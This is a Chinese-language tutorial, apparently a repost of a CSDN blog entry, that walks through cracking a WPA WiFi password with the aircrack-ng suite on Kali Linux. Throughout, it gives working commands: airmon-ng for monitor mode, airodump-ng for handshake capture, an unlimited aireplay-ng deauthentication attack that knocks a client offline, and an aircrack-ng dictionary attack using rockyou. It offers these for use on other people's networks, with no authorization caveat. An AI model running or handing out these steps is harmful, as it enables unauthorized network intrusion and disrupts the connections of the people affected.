期準備VMware Workstation虛擬機在虛擬機安裝好kail linunx系統無線網卡(晶片為3070或者1887L都支持Linux)一.打開終端,用airmon-ng命令查看
如果出現無法訪問…沒有那個文件或目錄解決辦法:先在window主機上按win+r鍵然後輸入services.msc回車
找到VMware USB Arbitration Service,雙擊
1.啟動類型改為自動 …2.啟動服務狀態 …3.確定
二.打開虛擬機的設置,改成跟下圖中2一樣(如果為灰色無法更改,則需要關閉kail系統後再改)
將usb無線網卡插在電腦上,(注意:網卡晶片為3070或者8187L,買的時候要注意)點擊 虛擬機 -> 可行動裝置 -> 選擇那個有WLAN的 -> 連接
三.命令ifconfig查看網卡信息,有wlan0表示連接成功
四.命令airmon-ng start wlan0開啟網卡監聽模式
五.輸入iwconfig命令查看網卡信息, wlan0mon網卡名加了mon則表示成功
六.命令airodump-ng wlan0mon,開始掃描WiFi,按ctrl+c結束任務
BSSID為wifi的MAC地址,PWR為信號強弱程度,數值越小信號越強;#DATA為數據量,越大使用的人就越多,CH為信道頻率(頻道),ESSID為wifi的名稱,中文可能會有亂碼
七,接著輸入airodump-ng --bssid BSSID -c 信道頻率 -w 抓包存儲的路徑 wlan0mon
如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/wifi wlan0mon
數據包已經正在抓取如果抓取不到數據,新建一個終端:鍵入airepaly-ng -0 0 -c 連接到WiFi的手機mac地址 -a bssid 網卡名(一般為wlan0mon)
如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon
(0 WiFi設備無限次數,-0 8則攻擊8次。攻擊原理是:先讓設備掉線,設備會再自動連接,並發這個自動連接過程會進行三次握手,會發送tcp包(裡面包含加密的密碼數據),我方偽裝成WiFi熱點去竊取該數據包。我方竊取後即可用字典窮舉法暴力破解加密的WiFi密碼,數據包裡面的密碼是哈希加密的,哈希加密只能正向)
出現WPA handshake時,表示抓包成功
兩個終端都按Ctrl+c停止,不然那邊會一直斷網的
cd打開抓包的目錄,ls列出來,就看到我們抓到的數據包
八.解壓kali自帶的字典文件 路徑:/usr/share/wordlists/rockyou.txt.gz
如 :gzip -d/usr/share/wordlists/rockyou.txt.gz
九.鍵入 aircrack-ng -w 字典路徑 握手包路徑,回車後開始爆破
如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap
耐心等待密碼破解吧…
特別說明:暴力破解並不簡單,需要足夠強大的字典和時間,可以通過字典生成工具生成自己的字典,字典越強大越容易破解。。哈哈,也是需要點運氣的!
原文連結:https://blog.csdn.net/weixin_44545251/article/details/100279827